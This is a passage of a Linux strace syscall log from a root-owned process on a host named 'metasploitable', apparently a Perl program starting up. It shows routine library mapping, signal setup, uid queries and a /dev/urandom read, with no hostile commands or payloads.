\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512
11119 20:13:30.145766 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0
11119 20:13:30.145785 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5b000
11119 20:13:30.145797 mmap2(0xb7d64000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d64000
11119 20:13:30.145825 mmap2(0xb7d66000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d66000
11119 20:13:30.145839 close(1)          = 0
11119 20:13:30.145864 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5a000
11119 20:13:30.145877 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d5a8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11119 20:13:30.145940 mprotect(0xb7ed6000, 4096, PROT_READ) = 0
11119 20:13:30.145968 munmap(0xb7f1e000, 29913) = 0
11119 20:13:30.145981 set_tid_address(0xb7d5a908) = 11119
11119 20:13:30.145991 set_robust_list(0xb7d5a910, 0xc) = 0
11119 20:13:30.146001 futex(0xbfbfb890, 0x81 /* FUTEX_??? */, 1) = 0
11119 20:13:30.146016 rt_sigaction(SIGRTMIN, {0xb7ee02c0, [], SA_SIGINFO}, NULL, 8) = 0
11119 20:13:30.146029 rt_sigaction(SIGRT_1, {0xb7ee0340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0
11119 20:13:30.146042 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
11119 20:13:30.146056 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
11119 20:13:30.146076 uname({sys="Linux", node="metasploitable", ...}) = 0
11119 20:13:30.146124 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
11119 20:13:30.146214 brk(0)            = 0x8153000
11119 20:13:30.146226 brk(0x8174000)    = 0x8174000
11119 20:13:30.146290 getuid32()        = 0
11119 20:13:30.146300 geteuid32()       = 0
11119 20:13:30.146310 getgid32()        = 0
11119 20:13:30.146319 getegid32()       = 0
11119 20:13:30.146356 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d39000
11119 20:13:30.146384 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1
11119 20:13:30.146402 read(1, "\2628\16\t", 4) = 4
11119 20:13:30.146417 close(1)          = 0
11119 20:13:30.146435 time(NULL)        = 1495671210
11119 20:13:30.146479 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfbfb560) = -1 ENOENT (No such file or directory)
